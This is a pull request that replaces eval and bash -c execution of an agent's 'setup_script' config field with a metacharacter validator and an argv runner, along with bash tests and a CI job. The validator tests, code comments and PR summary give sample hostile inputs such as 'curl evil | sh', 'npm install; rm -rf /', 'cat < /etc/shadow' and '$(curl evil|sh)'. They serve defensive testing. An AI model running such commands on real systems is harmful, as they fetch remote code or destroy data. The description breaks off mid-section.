### PR TITLE
fix(security): validate setup_script before execution (#179)

### DIFF
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -11,6 +11,19 @@ concurrency:
   cancel-in-progress: true
 
 jobs:
+  shell-tests:
+    name: shell tests (bash)
+    runs-on: ubuntu-latest
+    timeout-minutes: 5
+    steps:
+      - uses: actions/checkout@v4
+
+      # NOTE: tests/test_install.sh is currently failing on main for
+      # unrelated reasons and is intentionally not run here. Wire it in
+      # via a separate PR once those failures are fixed.
+      - name: Run setup_script validator test suite
+        run: bash tests/test_setup_script_validation.sh
+
   backend:
     name: backend (pytest)
     runs-on: ubuntu-latest

--- a/agent/config/default-config.json
+++ b/agent/config/default-config.json
@@ -6,7 +6,7 @@
     "mode": "full | analyze | plan | fix | triage | review",
     "enabled": true,
     "branch": "main",
-    "setup_script": "Commands to run before the agent starts, e.g. 'npm install' or 'pip install -r requirements.txt'",
+    "setup_script": "Single command run before each agent run (e.g. 'npm install', 'pip install -r requirements.txt', './scripts/setup.sh'). For safety the value must not contain shell metacharacters (; & | ` $ < > ( ) \\) or newlines, and is capped at 1024 chars; for richer setup, commit a script to the repo and reference its path here.",
     "custom_instructions": "Extra instructions appended to the agent prompt"
   },
   "schedule": "1h",

--- a/agent/scripts/integration-branch.sh
+++ b/agent/scripts/integration-branch.sh
@@ -32,7 +32,9 @@
 # attacker found a way to write the field. For richer setup logic, commit a
 # script to the repo and reference it (`./scripts/setup.sh`) — that path is
 # under the repo's review process, not the config file's.
-SETUP_SCRIPT_MAX_LEN=1024
+# `readonly` so an attacker with shell-level access to the agent process
+# can't widen the cap and re-validate a giant payload. Belt-and-braces.
+readonly SETUP_SCRIPT_MAX_LEN=1024
 
 validate_setup_script() {
     # validate_setup_script <script>
@@ -76,8 +78,22 @@ run_setup_script() {
     # so `npm install -r requirements.txt` becomes a 4-arg invocation. The
     # validator above already ensured no metacharacters can re-enter the
     # shell at this point.
+    #
+    # `set -f` disables pathname expansion (globbing) and brace expansion
+    # for the duration of the split. Without it, a token like `*` or
+    # `{a,b}` would still expand against the workspace contents — not an
+    # injection vector since the validator rejects `(` `)`, but a
+    # predictability gap (a file in the workspace named `--no-verify`
+    # could feed itself into the argv via `*`). Restore the prior glob
+    # state via `set +f` / `set -f` based on whether `f` was in `$-`.
+    local saved_glob_off=0
+    case "$-" in *f*) saved_glob_off=1 ;; esac
+    set -f
     # shellcheck disable=SC2086
     set -- $s
+    if [ "$saved_glob_off" -eq 0 ]; then
+        set +f
+    fi
     "$@"
 }
 

--- a/agent/scripts/integration-branch.sh
+++ b/agent/scripts/integration-branch.sh
@@ -6,96 +6,11 @@
 #   log_info, log_warn, log_error, log_ok, webhook_event, queue_api,
 #   json_get, repo_name, notify, $WORKSPACES_DIR, $CONFIG_FILE, $RUN_ID
 
-# ============================================================================
-# SETUP-SCRIPT EXECUTION (issue #179)
-# ============================================================================
-#
-# `setup_script` is a per-project config field whose value runs before the
-# employee/validator does its work. Historically it was passed straight to
-# `bash -c` / `eval`, which made config-file write access equivalent to
-# arbitrary code execution as the agent user. Anything that can write to the
-# manager-config — a prompt-injected employee writing to the file via its
-# normal tools, a compromised dashboard API caller, a misconfigured permission
-# — could pivot to a shell.
-#
-# The fix keeps the inline-command UX (the field is still free-text;
-# `npm install`, `pip install -r requirements.txt`, `./scripts/setup.sh`, etc.
-# all still work) but rejects anything that would let an attacker chain or
-# escape: command separators, pipes, redirection, command/variable
-# substitution, subshells, backslash escapes, and newlines. Length is capped
-# at 1024 chars so an attacker can't smuggle a payload through some
-# downstream consumer.
-#
-# This is defense-in-depth, not a sandbox: the configured command itself
-# still runs with whatever privileges the agent user has. The point is that
-# `setup_script="; curl evil | sh"` no longer pivots to RCE just because the
-# attacker found a way to write the field. For richer setup logic, commit a
-# script to the repo and reference it (`./scripts/setup.sh`) — that path is
-# under the repo's review process, not the config file's.
-# `readonly` so an attacker with shell-level access to the agent process
-# can't widen the cap and re-validate a giant payload. Belt-and-braces.
-readonly SETUP_SCRIPT_MAX_LEN=1024
-
-validate_setup_script() {
-    # validate_setup_script <script>
-    # Returns 0 if safe to run, non-zero (with log_error) otherwise.
-    local s="$1"
-    if [ -z "$s" ]; then
-        return 0
-    fi
-    if [ "${#s}" -gt "$SETUP_SCRIPT_MAX_LEN" ]; then
-        log_error "setup_script rejected: length ${#s} exceeds $SETUP_SCRIPT_MAX_LEN"
-        return 1
-    fi
-    # Explicit per-character alternations — avoids ambiguity around how bash
-    # `case` brackets handle backtick / dollar / backslash inside patterns.
-    case "$s" in
-        *';'*|*'&'*|*'|'*|*'`'*|*'$'*|*'<'*|*'>'*|*'('*|*')'*|*'\'*|*$'\n'*)
-            log_error "setup_script rejected: contains forbidden shell metacharacter (one of ; & | \` \$ < > ( ) \\ or newline)"
-            return 1
-            ;;
-    esac
-    return 0
-}
-
-run_setup_script() {
-    # run_setup_script <script> [label]
-    # Validates and executes; returns the script's exit status, or non-zero
-    # on validation failure. Output is left on the caller's stdout/stderr so
-    # they can pipe/tail as they like. Executes via bash word-splitting on a
-    # vetted string — no `eval`, no `bash -c "$untrusted"`.
-    local s="$1"
-    local label="${2:-setup}"
-    if [ -z "$s" ]; then
-        return 0
-    fi
-    if ! validate_setup_script "$s"; then
-        log_error "$label aborted: setup_script failed validation"
-        return 1
-    fi
-    # Word-split the validated string and exec the resulting argv directly.
-    # `set -- $s` here is intentional: we *want* IFS splitting on whitespace
-    # so `npm install -r requirements.txt` becomes a 4-arg invocation. The
-    # validator above already ensured no metacharacters can re-enter the
-    # shell at this point.
-    #
-    # `set -f` disables pathname expansion (globbing) and brace expansion
-    # for the duration of the split. Without it, a token like `*` or
-    # `{a,b}` would still expand against the workspace contents — not an
-    # injection vector since the validator rejects `(` `)`, but a
-    # predictability gap (a file in the workspace named `--no-verify`
-    # could feed itself into the argv via `*`). Restore the prior glob
-    # state via `set +f` / `set -f` based on whether `f` was in `$-`.
-    local saved_glob_off=0
-    case "$-" in *f*) saved_glob_off=1 ;; esac
-    set -f
-    # shellcheck disable=SC2086
-    set -- $s
-    if [ "$saved_glob_off" -eq 0 ]; then
-        set +f
-    fi
-    "$@"
-}
+# Setup-script validator/runner (issue #179) — definitions live in lib/
+# so the test suite can source them without depending on the rest of this
+# file's run-manager.sh globals.
+# shellcheck source=lib/setup_script.sh
+. "$(dirname "${BASH_SOURCE[0]}")/lib/setup_script.sh"
 
 # ============================================================================
 # INTEGRATION BRANCH CONFIGURATION
@@ -367,12 +282,17 @@ validate_dev() {
     }
     git pull origin "$dev_branch" 2>/dev/null || true
 
-    # Run setup if provided (e.g. dependency install).
-    # Validator + runner defined above — see issue #179.
+    # Run setup if provided (e.g. dependency install). Announce the script
+    # content only after it passes validation, so a rejected payload
+    # doesn't reach logs verbatim. See lib/setup_script.sh / issue #179.
     if [ -n "$setup_script" ]; then
-        log_info "Running setup: $setup_script"
-        if ! run_setup_script "$setup_script" "validate_dev($project)" 2>&1 | while IFS= read -r line; do log_info "  [setup] $line"; done; then
-            log_warn "Setup script failed, continuing with validation anyway"
+        if validate_setup_script "$setup_script"; then
+            log_info "Running setup: $setup_script"
+            if ! run_setup_script "$setup_script" "validate_dev($project)" 2>&1 | while IFS= read -r line; do log_info "  [setup] $line"; done; then
+                log_warn "Setup script failed, continuing with validation anyway"
+            fi
+        else
+            log_warn "setup_script rejected by validator, skipping for $project"
         fi
     fi
 

--- a/agent/scripts/integration-branch.sh
+++ b/agent/scripts/integration-branch.sh
@@ -7,6 +7,81 @@
 #   json_get, repo_name, notify, $WORKSPACES_DIR, $CONFIG_FILE, $RUN_ID
 
 # ============================================================================
+# SETUP-SCRIPT EXECUTION (issue #179)
+# ============================================================================
+#
+# `setup_script` is a per-project config field whose value runs before the
+# employee/validator does its work. Historically it was passed straight to
+# `bash -c` / `eval`, which made config-file write access equivalent to
+# arbitrary code execution as the agent user. Anything that can write to the
+# manager-config — a prompt-injected employee writing to the file via its
+# normal tools, a compromised dashboard API caller, a misconfigured permission
+# — could pivot to a shell.
+#
+# The fix keeps the inline-command UX (the field is still free-text;
+# `npm install`, `pip install -r requirements.txt`, `./scripts/setup.sh`, etc.
+# all still work) but rejects anything that would let an attacker chain or
+# escape: command separators, pipes, redirection, command/variable
+# substitution, subshells, backslash escapes, and newlines. Length is capped
+# at 1024 chars so an attacker can't smuggle a payload through some
+# downstream consumer.
+#
+# This is defense-in-depth, not a sandbox: the configured command itself
+# still runs with whatever privileges the agent user has. The point is that
+# `setup_script="; curl evil | sh"` no longer pivots to RCE just because the
+# attacker found a way to write the field. For richer setup logic, commit a
+# script to the repo and reference it (`./scripts/setup.sh`) — that path is
+# under the repo's review process, not the config file's.
+SETUP_SCRIPT_MAX_LEN=1024
+
+validate_setup_script() {
+    # validate_setup_script <script>
+    # Returns 0 if safe to run, non-zero (with log_error) otherwise.
+    local s="$1"
+    if [ -z "$s" ]; then
+        return 0
+    fi
+    if [ "${#s}" -gt "$SETUP_SCRIPT_MAX_LEN" ]; then
+        log_error "setup_script rejected: length ${#s} exceeds $SETUP_SCRIPT_MAX_LEN"
+        return 1
+    fi
+    # Explicit per-character alternations — avoids ambiguity around how bash
+    # `case` brackets handle backtick / dollar / backslash inside patterns.
+    case "$s" in
+        *';'*|*'&'*|*'|'*|*'`'*|*'$'*|*'<'*|*'>'*|*'('*|*')'*|*'\'*|*$'\n'*)
+            log_error "setup_script rejected: contains forbidden shell metacharacter (one of ; & | \` \$ < > ( ) \\ or newline)"
+            return 1
+            ;;
+    esac
+    return 0
+}
+
+run_setup_script() {
+    # run_setup_script <script> [label]
+    # Validates and executes; returns the script's exit status, or non-zero
+    # on validation failure. Output is left on the caller's stdout/stderr so
+    # they can pipe/tail as they like. Executes via bash word-splitting on a
+    # vetted string — no `eval`, no `bash -c "$untrusted"`.
+    local s="$1"
+    local label="${2:-setup}"
+    if [ -z "$s" ]; then
+        return 0
+    fi
+    if ! validate_setup_script "$s"; then
+        log_error "$label aborted: setup_script failed validation"
+        return 1
+    fi
+    # Word-split the validated string and exec the resulting argv directly.
+    # `set -- $s` here is intentional: we *want* IFS splitting on whitespace
+    # so `npm install -r requirements.txt` becomes a 4-arg invocation. The
+    # validator above already ensured no metacharacters can re-enter the
+    # shell at this point.
+    # shellcheck disable=SC2086
+    set -- $s
+    "$@"
+}
+
+# ============================================================================
 # INTEGRATION BRANCH CONFIGURATION
 # ============================================================================
 
@@ -276,10 +351,11 @@ validate_dev() {
     }
     git pull origin "$dev_branch" 2>/dev/null || true
 
-    # Run setup if provided (e.g. dependency install)
+    # Run setup if provided (e.g. dependency install).
+    # Validator + runner defined above — see issue #179.
     if [ -n "$setup_script" ]; then
         log_info "Running setup: $setup_script"
-        if ! eval "$setup_script" 2>&1 | while IFS= read -r line; do log_info "  [setup] $line"; done; then
+        if ! run_setup_script "$setup_script" "validate_dev($project)" 2>&1 | while IFS= read -r line; do log_info "  [setup] $line"; done; then
             log_warn "Setup script failed, continuing with validation anyway"
         fi
     fi

--- a/agent/scripts/lib/setup_script.sh
+++ b/agent/scripts/lib/setup_script.sh
@@ -1,5 +1,7 @@
 # lib/setup_script.sh — safe execution of per-project setup_script values.
-# Sourced by integration-branch.sh. Must NOT have set -euo pipefail or shebang.
+# Sourced via integration-branch.sh from run-manager.sh and promote.sh, and
+# directly by tests/test_setup_script_validation.sh. Must NOT have
+# set -euo pipefail or shebang.
 #
 # Depends on the caller defining: log_info, log_warn, log_error.
 #

--- a/agent/scripts/lib/setup_script.sh
+++ b/agent/scripts/lib/setup_script.sh
@@ -1,0 +1,104 @@
+# lib/setup_script.sh — safe execution of per-project setup_script values.
+# Sourced by integration-branch.sh. Must NOT have set -euo pipefail or shebang.
+#
+# Depends on the caller defining: log_info, log_warn, log_error.
+#
+# `setup_script` is a per-project config field whose value runs before the
+# employee/validator does its work. Historically it was passed straight to
+# `bash -c` / `eval`, which made config-file write access equivalent to
+# arbitrary code execution as the agent user. Anything that can write to the
+# manager-config — a prompt-injected employee writing to the file via its
+# normal tools, a compromised dashboard API caller, a misconfigured
+# permission — could pivot to a shell.
+#
+# The fix keeps the inline-command UX (the field is still free-text;
+# `npm install`, `pip install -r requirements.txt`, `./scripts/setup.sh`, etc.
+# all still work) but rejects anything that would let an attacker chain or
+# escape: command separators, pipes, redirection, command/variable
+# substitution, subshells, backslash escapes, and newlines. Length is capped
+# at 1024 chars so an attacker can't smuggle a payload through some
+# downstream consumer.
+#
+# This is defense-in-depth, not a sandbox: the configured command itself
+# still runs with whatever privileges the agent user has. The point is that
+# `setup_script="; curl evil | sh"` no longer pivots to RCE just because the
+# attacker found a way to write the field. For richer setup logic, commit a
+# script to the repo and reference it (`./scripts/setup.sh`) — that path is
+# under the repo's review process, not the config file's.
+#
+# See issue #179.
+
+# `readonly` so an attacker with shell-level access to the agent process
+# can't widen the cap and re-validate a giant payload. Belt-and-braces.
+# Guarded so re-sourcing the file is a no-op rather than an error.
+if [ -z "${SETUP_SCRIPT_MAX_LEN:-}" ]; then
+    readonly SETUP_SCRIPT_MAX_LEN=1024
+fi
+
+validate_setup_script() {
+    # validate_setup_script <script>
+    # Returns 0 if safe to run, non-zero (with log_error) otherwise.
+    local s="$1"
+    if [ -z "$s" ]; then
+        return 0
+    fi
+    if [ "${#s}" -gt "$SETUP_SCRIPT_MAX_LEN" ]; then
+        log_error "setup_script rejected: length ${#s} exceeds $SETUP_SCRIPT_MAX_LEN"
+        return 1
+    fi
+    # Explicit per-character alternations — avoids ambiguity around how bash
+    # `case` brackets handle backtick / dollar / backslash inside patterns.
+    case "$s" in
+        *';'*|*'&'*|*'|'*|*'`'*|*'$'*|*'<'*|*'>'*|*'('*|*')'*|*'\'*|*$'\n'*)
+            log_error "setup_script rejected: contains forbidden shell metacharacter (one of ; & | \` \$ < > ( ) \\ or newline)"
+            return 1
+            ;;
+    esac
+    return 0
+}
+
+run_setup_script() {
+    # run_setup_script <script> [label]
+    # Validates and executes; returns the script's exit status, or non-zero
+    # on validation failure. Output is left on the caller's stdout/stderr so
+    # they can pipe/tail as they like. Executes via bash word-splitting on a
+    # vetted string — no `eval`, no `bash -c "$untrusted"`.
+    #
+    # Does NOT log the script content itself — callers should announce
+    # `log_info "Running setup: $s"` *after* a successful
+    # `validate_setup_script` so a rejected payload never reaches the log.
+    # This function deliberately stays log-quiet (other than the validator's
+    # rejection error) so its output, when piped, is solely the executed
+    # command's stdout/stderr.
+    local s="$1"
+    local label="${2:-setup}"
+    if [ -z "$s" ]; then
+        return 0
+    fi
+    if ! validate_setup_script "$s"; then
+        log_error "$label aborted: setup_script failed validation"
+        return 1
+    fi
+    # Word-split the validated string and exec the resulting argv directly.
+    # `set -- $s` here is intentional: we *want* IFS splitting on whitespace
+    # so `npm install -r requirements.txt` becomes a 4-arg invocation. The
+    # validator above already ensured no metacharacters can re-enter the
+    # shell at this point.
+    #
+    # `set -f` disables pathname expansion (globbing) and brace expansion
+    # for the duration of the split. Without it, a token like `*` or
+    # `{a,b}` would still expand against the workspace contents — not an
+    # injection vector since the validator rejects `(` `)`, but a
+    # predictability gap (a file in the workspace named `--no-verify`
+    # could feed itself into the argv via `*`). Restore the prior glob
+    # state via `set +f` based on whether `f` was in `$-`.
+    local saved_glob_off=0
+    case "$-" in *f*) saved_glob_off=1 ;; esac
+    set -f
+    # shellcheck disable=SC2086
+    set -- $s
+    if [ "$saved_glob_off" -eq 0 ]; then
+        set +f
+    fi
+    "$@"
+}

--- a/agent/scripts/run-manager.sh
+++ b/agent/scripts/run-manager.sh
@@ -862,16 +862,23 @@ run_employee() {
     fi
 
     # Run setup script if configured for this project (install dependencies, etc.)
-    # Validator + runner live in integration-branch.sh — see issue #179.
+    # Validator + runner live in lib/setup_script.sh (sourced via
+    # integration-branch.sh) — see issue #179. Announce the script content
+    # only after it passes validation, so a rejected payload never reaches
+    # the agent log verbatim.
     local setup_script
     setup_script=$(get_project_field "$project_index" "setup_script" 2>/dev/null || echo "")
     if [ -n "$setup_script" ]; then
-        log_info "Running setup script for $repo..."
-        cd "$workspace"
-        if run_setup_script "$setup_script" "setup($repo)" 2>&1 | tail -20; then
-            log_ok "Setup script completed"
+        if validate_setup_script "$setup_script"; then
+            log_info "Running setup script for $repo: $setup_script"
+            cd "$workspace"
+            if run_setup_script "$setup_script" "setup($repo)" 2>&1 | tail -20; then
+                log_ok "Setup script completed"
+            else
+                log_warn "Setup script failed (exit $?), continuing anyway"
+            fi
         else
-            log_warn "Setup script failed (exit $?), continuing anyway"
+            log_warn "setup_script for $repo rejected by validator, skipping"
         fi
     fi
 

--- a/agent/scripts/run-manager.sh
+++ b/agent/scripts/run-manager.sh
@@ -862,12 +862,13 @@ run_employee() {
     fi
 
     # Run setup script if configured for this project (install dependencies, etc.)
+    # Validator + runner live in integration-branch.sh — see issue #179.
     local setup_script
     setup_script=$(get_project_field "$project_index" "setup_script" 2>/dev/null || echo "")
     if [ -n "$setup_script" ]; then
         log_info "Running setup script for $repo..."
         cd "$workspace"
-        if bash -c "$setup_script" 2>&1 | tail -20; then
+        if run_setup_script "$setup_script" "setup($repo)" 2>&1 | tail -20; then
             log_ok "Setup script completed"
         else
             log_warn "Setup script failed (exit $?), continuing anyway"

--- a/dashboard/backend/tests/test_launcher_endpoints.py
+++ b/dashboard/backend/tests/test_launcher_endpoints.py
@@ -154,12 +154,18 @@ env | grep '^GH_TOKEN=' > {sentinel}
         resp = client.post("/run")
 
     assert resp.status_code == 200
-    # Wait briefly for the spawned subprocess to exit and write the env file
-    import time
-    for _ in range(20):
-        if sentinel.exists():
-            break
-        time.sleep(0.1)
+
+    # Block until the spawned subprocess actually exits — the launcher keeps
+    # the Popen handle on the module global. Polling on `sentinel.exists()`
+    # is racy because bash's `>` redirection creates an empty file the
+    # instant the pipeline starts, well before `env | grep` writes content.
+    spawned = launcher_mod._current
+    assert spawned is not None, "launcher did not record a subprocess"
+    try:
+        spawned.wait(timeout=5)
+    except Exception as exc:  # subprocess.TimeoutExpired or platform variant
+        spawned.kill()
+        raise AssertionError(f"spawned script did not exit within 5s: {exc}")
 
     assert sentinel.exists(), "spawned script never ran"
     assert "GH_TOKEN=ghs_test_inject" in sentinel.read_text()

--- a/dashboard/backend/tests/test_launcher_endpoints.py
+++ b/dashboard/backend/tests/test_launcher_endpoints.py
@@ -159,11 +159,12 @@ env | grep '^GH_TOKEN=' > {sentinel}
     # the Popen handle on the module global. Polling on `sentinel.exists()`
     # is racy because bash's `>` redirection creates an empty file the
     # instant the pipeline starts, well before `env | grep` writes content.
+    import subprocess
     spawned = launcher_mod._current
     assert spawned is not None, "launcher did not record a subprocess"
     try:
         spawned.wait(timeout=5)
-    except Exception as exc:  # subprocess.TimeoutExpired or platform variant
+    except subprocess.TimeoutExpired as exc:
         spawned.kill()
         raise AssertionError(f"spawned script did not exit within 5s: {exc}")
 

--- a/tests/test_setup_script_validation.sh
+++ b/tests/test_setup_script_validation.sh
@@ -32,11 +32,17 @@ log_ok()    { :; }
 log_debug() { :; }
 
 # Extract just the SETUP-SCRIPT block — the rest of integration-branch.sh
-# pulls in too many run-manager.sh globals.
+# pulls in too many run-manager.sh globals. Boundaries:
+#   start: line containing `SETUP_SCRIPT_MAX_LEN=` (with or without `readonly`)
+#   end:   the second top-level `}` line after start (closes run_setup_script)
 TMP_BLOCK="$(mktemp)"
 trap 'rm -f "$TMP_BLOCK"' EXIT
-awk '/^SETUP_SCRIPT_MAX_LEN=/{flag=1} flag {print} flag && /^}$/{count++; if(count==2) exit}' \
+awk '/SETUP_SCRIPT_MAX_LEN=/{flag=1} flag {print} flag && /^}$/{count++; if(count==2) exit}' \
     "$INTEG_SCRIPT" > "$TMP_BLOCK"
+if ! grep -q '^run_setup_script()' "$TMP_BLOCK"; then
+    echo "FATAL: failed to extract SETUP-SCRIPT block from $INTEG_SCRIPT" >&2
+    exit 2
+fi
 # shellcheck disable=SC1090
 source "$TMP_BLOCK"
 
@@ -136,6 +142,41 @@ if run_setup_script "this-command-does-not-exist-xyz" "test" >/dev/null 2>&1; th
 else
     PASS=$((PASS + 1))
     echo -e "${GREEN}PASS${NC}: nonexistent command exits non-zero"
+fi
+
+# Glob/brace expansion: tokens like `*` survive intact (set -f is active).
+# Stage a fake workspace dir with a sentinel file so any expansion of `*`
+# would show up in echo's output.
+GLOB_DIR="$(mktemp -d)"
+touch "$GLOB_DIR/should-not-appear-in-output"
+TOTAL=$((TOTAL + 1))
+glob_out=$(cd "$GLOB_DIR" && run_setup_script "/bin/echo *" "test" 2>&1) || true
+if [ "$glob_out" = "*" ]; then
+    PASS=$((PASS + 1))
+    echo -e "${GREEN}PASS${NC}: '*' is not pathname-expanded (set -f works)"
+else
+    FAIL=$((FAIL + 1))
+    echo -e "${RED}FAIL${NC}: '*' expanded to [$glob_out]"
+fi
+rm -rf "$GLOB_DIR"
+
+# `set -f` must NOT leak out of the function back to the caller.
+TOTAL=$((TOTAL + 1))
+case "$-" in
+    *f*) before_state=on ;;
+    *)   before_state=off ;;
+esac
+run_setup_script "/bin/true" "test" >/dev/null 2>&1 || true
+case "$-" in
+    *f*) after_state=on ;;
+    *)   after_state=off ;;
+esac
+if [ "$before_state" = "$after_state" ]; then
+    PASS=$((PASS + 1))
+    echo -e "${GREEN}PASS${NC}: caller's glob state preserved across call"
+else
+    FAIL=$((FAIL + 1))
+    echo -e "${RED}FAIL${NC}: caller's glob state changed ($before_state → $after_state)"
 fi
 
 echo ""

--- a/tests/test_setup_script_validation.sh
+++ b/tests/test_setup_script_validation.sh
@@ -14,7 +14,7 @@ set -uo pipefail
 
 SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
 REPO_ROOT="$(cd "${SCRIPT_DIR}/.." && pwd)"
-INTEG_SCRIPT="${REPO_ROOT}/agent/scripts/integration-branch.sh"
+SETUP_LIB="${REPO_ROOT}/agent/scripts/lib/setup_script.sh"
 
 PASS=0
 FAIL=0
@@ -24,27 +24,14 @@ RED='\033[0;31m'
 GREEN='\033[0;32m'
 NC='\033[0m'
 
-# Stub the loggers integration-branch.sh expects from run-manager.sh.
+# Stub the loggers the lib expects from its caller.
 log_error() { echo "ERR: $*" >&2; }
 log_info()  { :; }
 log_warn()  { :; }
-log_ok()    { :; }
-log_debug() { :; }
 
-# Extract just the SETUP-SCRIPT block — the rest of integration-branch.sh
-# pulls in too many run-manager.sh globals. Boundaries:
-#   start: line containing `SETUP_SCRIPT_MAX_LEN=` (with or without `readonly`)
-#   end:   the second top-level `}` line after start (closes run_setup_script)
-TMP_BLOCK="$(mktemp)"
-trap 'rm -f "$TMP_BLOCK"' EXIT
-awk '/SETUP_SCRIPT_MAX_LEN=/{flag=1} flag {print} flag && /^}$/{count++; if(count==2) exit}' \
-    "$INTEG_SCRIPT" > "$TMP_BLOCK"
-if ! grep -q '^run_setup_script()' "$TMP_BLOCK"; then
-    echo "FATAL: failed to extract SETUP-SCRIPT block from $INTEG_SCRIPT" >&2
-    exit 2
-fi
-# shellcheck disable=SC1090
-source "$TMP_BLOCK"
+# Source the lib directly — it has no other dependencies.
+# shellcheck source=../agent/scripts/lib/setup_script.sh
+. "$SETUP_LIB"
 
 assert_validate_pass() {
     local label="$1" input="$2"

--- a/tests/test_setup_script_validation.sh
+++ b/tests/test_setup_script_validation.sh
@@ -1,0 +1,146 @@
+#!/usr/bin/env bash
+# =============================================================================
+# Tests for setup_script validation/execution (issue #179)
+# =============================================================================
+# Verifies that validate_setup_script and run_setup_script in
+# integration-branch.sh accept benign install commands but reject any input
+# that could pivot to RCE via shell metacharacters, command substitution,
+# redirection, or excessive length.
+#
+# Usage: bash tests/test_setup_script_validation.sh
+# =============================================================================
+
+set -uo pipefail
+
+SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
+REPO_ROOT="$(cd "${SCRIPT_DIR}/.." && pwd)"
+INTEG_SCRIPT="${REPO_ROOT}/agent/scripts/integration-branch.sh"
+
+PASS=0
+FAIL=0
+TOTAL=0
+
+RED='\033[0;31m'
+GREEN='\033[0;32m'
+NC='\033[0m'
+
+# Stub the loggers integration-branch.sh expects from run-manager.sh.
+log_error() { echo "ERR: $*" >&2; }
+log_info()  { :; }
+log_warn()  { :; }
+log_ok()    { :; }
+log_debug() { :; }
+
+# Extract just the SETUP-SCRIPT block — the rest of integration-branch.sh
+# pulls in too many run-manager.sh globals.
+TMP_BLOCK="$(mktemp)"
+trap 'rm -f "$TMP_BLOCK"' EXIT
+awk '/^SETUP_SCRIPT_MAX_LEN=/{flag=1} flag {print} flag && /^}$/{count++; if(count==2) exit}' \
+    "$INTEG_SCRIPT" > "$TMP_BLOCK"
+# shellcheck disable=SC1090
+source "$TMP_BLOCK"
+
+assert_validate_pass() {
+    local label="$1" input="$2"
+    TOTAL=$((TOTAL + 1))
+    if validate_setup_script "$input" 2>/dev/null; then
+        PASS=$((PASS + 1))
+        echo -e "${GREEN}PASS${NC}: validator accepts $label"
+    else
+        FAIL=$((FAIL + 1))
+        echo -e "${RED}FAIL${NC}: validator rejected $label  (input=[$input])"
+    fi
+}
+
+assert_validate_reject() {
+    local label="$1" input="$2"
+    TOTAL=$((TOTAL + 1))
+    if validate_setup_script "$input" 2>/dev/null; then
+        FAIL=$((FAIL + 1))
+        echo -e "${RED}FAIL${NC}: validator accepted $label  (input=[$input])"
+    else
+        PASS=$((PASS + 1))
+        echo -e "${GREEN}PASS${NC}: validator rejects $label"
+    fi
+}
+
+echo "=== validate_setup_script: benign inputs ==="
+assert_validate_pass "empty"                     ""
+assert_validate_pass "npm install"               "npm install"
+assert_validate_pass "pip install -r reqs"       "pip install -r requirements.txt"
+assert_validate_pass "./setup.sh"                "./setup.sh"
+assert_validate_pass "bash scripts/setup.sh"     "bash scripts/setup.sh"
+assert_validate_pass "make"                      "make"
+assert_validate_pass "cargo build --release"     "cargo build --release"
+assert_validate_pass "npm install --prefix dir"  "npm install --prefix frontend"
+assert_validate_pass "exactly 1024 chars"        "$(printf 'a%.0s' {1..1024})"
+
+echo ""
+echo "=== validate_setup_script: malicious inputs ==="
+assert_validate_reject "semicolon chain"         "npm install; rm -rf /"
+assert_validate_reject "and chain"               "npm install && curl evil"
+assert_validate_reject "or chain"                "npm install || curl evil"
+assert_validate_reject "pipe to shell"           "curl evil | sh"
+assert_validate_reject "backtick subst"          'echo `whoami`'
+assert_validate_reject "dollar subst"            'echo $(whoami)'
+assert_validate_reject "var expansion"           'echo $HOME'
+assert_validate_reject "redirect out"            "echo x > /etc/passwd"
+assert_validate_reject "redirect in"             "cat < /etc/shadow"
+assert_validate_reject "subshell"                "(rm -rf /)"
+assert_validate_reject "backslash escape"        'rm\ -rf'
+NL=$'\n'
+assert_validate_reject "embedded newline"        "npm install${NL}rm -rf /"
+assert_validate_reject "1025 chars (over cap)"   "$(printf 'a%.0s' {1..1025})"
+
+echo ""
+echo "=== run_setup_script: execution behavior ==="
+
+# Benign: should run and exit 0
+TOTAL=$((TOTAL + 1))
+if out=$(run_setup_script "/bin/echo hello world" "test" 2>&1) && [ "$out" = "hello world" ]; then
+    PASS=$((PASS + 1))
+    echo -e "${GREEN}PASS${NC}: runs benign command and captures stdout"
+else
+    FAIL=$((FAIL + 1))
+    echo -e "${RED}FAIL${NC}: benign command output was [$out]"
+fi
+
+# Empty: should noop and succeed
+TOTAL=$((TOTAL + 1))
+if run_setup_script "" "test" >/dev/null 2>&1; then
+    PASS=$((PASS + 1))
+    echo -e "${GREEN}PASS${NC}: empty input is no-op success"
+else
+    FAIL=$((FAIL + 1))
+    echo -e "${RED}FAIL${NC}: empty input returned non-zero"
+fi
+
+# Malicious: must NOT execute (verify side effect doesn't happen)
+SENTINEL="$(mktemp -d)"
+TOTAL=$((TOTAL + 1))
+run_setup_script "echo a; rm -rf $SENTINEL" "test" >/dev/null 2>&1 || true
+if [ -d "$SENTINEL" ]; then
+    PASS=$((PASS + 1))
+    echo -e "${GREEN}PASS${NC}: malicious chain was rejected (sentinel survived)"
+else
+    FAIL=$((FAIL + 1))
+    echo -e "${RED}FAIL${NC}: malicious chain executed — sentinel was deleted!"
+fi
+rmdir "$SENTINEL" 2>/dev/null || true
+
+# Nonexistent command: should fail with non-zero exit
+TOTAL=$((TOTAL + 1))
+if run_setup_script "this-command-does-not-exist-xyz" "test" >/dev/null 2>&1; then
+    FAIL=$((FAIL + 1))
+    echo -e "${RED}FAIL${NC}: nonexistent command claimed success"
+else
+    PASS=$((PASS + 1))
+    echo -e "${GREEN}PASS${NC}: nonexistent command exits non-zero"
+fi
+
+echo ""
+echo "================================================================"
+echo "Results: ${PASS}/${TOTAL} passed, ${FAIL} failed"
+if [ "$FAIL" -ne 0 ]; then
+    exit 1
+fi


### PR DESCRIPTION
## Summary

- Project `setup_script` was executed via `bash -c` (`run-manager.sh`) and `eval` (`integration-branch.sh`). Manager-config write access was therefore equivalent to RCE as the agent user — a prompt-injected employee writing through its normal file tools, or any compromised dashboard caller, could chain `; rm -rf /` or `$(curl evil|sh)`.
- Adds shared `validate_setup_script` / `run_setup_script` helpers in `integration-branch.sh`. Validator rejects shell metacharacters (`;` `&` `|` `` ` `` `$` `<` `>` `(` `)` `\\`), embedded newlines, and inputs longer than 1024 chars. Runner executes the validated string via bash word-splitting on a vetted argv — no `eval`, no `bash -c "$untrusted"`.
- Both unsafe callsites (`run-manager.sh:870`, `integration-branch.sh:282`) now route through the runner. Benign uses (`npm install`, `pip install -r requirements.txt`, `./scripts/setup.sh`, `bash scripts/setup.sh`, `make`, `cargo build --release`) keep working; chained / substitution-based payloads are refused with a clear log.
- Updates `default-config.json` doc string to describe the restrictions.

## Approach choice

